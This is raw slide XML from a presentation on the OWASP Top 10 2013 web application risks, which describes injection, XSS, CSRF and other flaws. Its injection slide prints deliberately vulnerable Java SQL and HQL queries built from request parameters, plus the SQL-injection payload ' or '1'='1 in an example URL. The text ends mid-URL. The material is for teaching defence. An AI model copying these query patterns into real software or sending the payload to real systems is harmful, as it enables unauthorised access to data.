                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Threat</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Agents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Attack</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Vectors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Weakness Prevalence</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Weakness Detectability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Technical Impacts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Business Impacts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r>
              <a:tr h="152400">
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0" dirty="0" smtClean="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smtClean="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App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> / Business Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="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52400">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Average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Common</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Average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Moderate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tr>
              <a:tr h="152400">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Difficult</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Uncommon</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Difficult</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Minor</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tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2185206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9600" y="990600"/>
            <a:ext cx="8153400" cy="8001000"/>
            <a:chOff x="-609600" y="990600"/>
            <a:chExt cx="8153400" cy="8001000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-609600" y="990600"/>
              <a:ext cx="8153400" cy="8001000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freeform 6"/>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Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 7"/>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A1 – Injection</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Freeform 8"/>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Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or  to exploit other implementation flaws to assume other users’ identities.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Freeform 9"/>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A2 – Broken Authentication and Session Management</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Freeform 10"/>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XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 11"/>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A3 – Cross-Site Scripting (XSS)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform 12"/>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A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 13"/>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A4 – Insecure Direct Object References</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Freeform 14"/>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Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="4207237"/>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A5 – Security Misconfiguration</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Freeform 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637"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Many web applications do not properly protect sensitive data, such as credit cards, tax </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>ID</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>s, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Freeform 17"/>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A6 – Sensitive Data Exposure</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Freeform 18"/>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Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Freeform 19"/>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A7 – Missing Function Level Access Control </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Freeform 20"/>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a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Freeform 21"/>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A8 - Cross-Site Request Forgery (CSRF)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Freeform 22"/>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Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If  a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Freeform 23"/>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A9 - Using Components with Known Vulnerabilities</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Freeform 24"/>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Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Freeform 25"/>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A10 – Unvalidated Redirects and Forwards</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OWASP Top 10 Application Security Risks – 2013 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>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T10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103752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690941850"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="957457"/>
          <a:ext cx="6858000" cy="2529546"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="642743">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83569">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t>Exploitability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0"/>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t>Prevalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>COMMON</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0"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t>Detectability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0"/>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t>Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>pact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0"/>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90563">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Consider</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> anyone who can send untrusted </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>data to the system,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> including external users, internal users, and administrators.</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000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attacker</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> sends simple text-based attacks that exploit the syntax of the targeted interpreter. Almost any source of data can be an injection vector, including internal sources.</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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Injection flaws</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> occur when an application sends untrusted data to an interpreter. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Injection flaws are very prevalent, particularly in legacy code.  They are often found in SQL, LDAP, Xpath, or NoSQL queries; OS commands; XML parsers, SMTP Headers, program arguments, etc. Injection flaws are easy to discover when examining code, but frequently hard to discover via testing. Scanners and fuzzers can help attackers find injection flaws.</a:t>
                      </a:r>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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> can result in data loss or corruption, lack of accountability, or denial of access. Injection can sometimes lead to complete host takeover.</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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Consider the business value of the affected data and</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> the platform running the interpreter. All data could be stolen, modified, or deleted.  Could your reputation be harmed?</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7" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7189"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Example Attack Scenarios</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: The application uses untrusted data in the construction of the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SQL call:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  String query = "SELECT * FROM accounts WHERE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  custID=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" + request.getParameter("id") + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Similarly, an application’s blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trust in frameworks may result in queries that are still vulnerable, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hibernate Query Language (HQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HQLQuery </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= session.createQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“FROM accounts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  WHERE custID=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“ + request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>") + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In both cases, the attacker modifies the ‘id’ parameter value in her browser to send:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' or '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. For example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example.com/app/accountView?id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
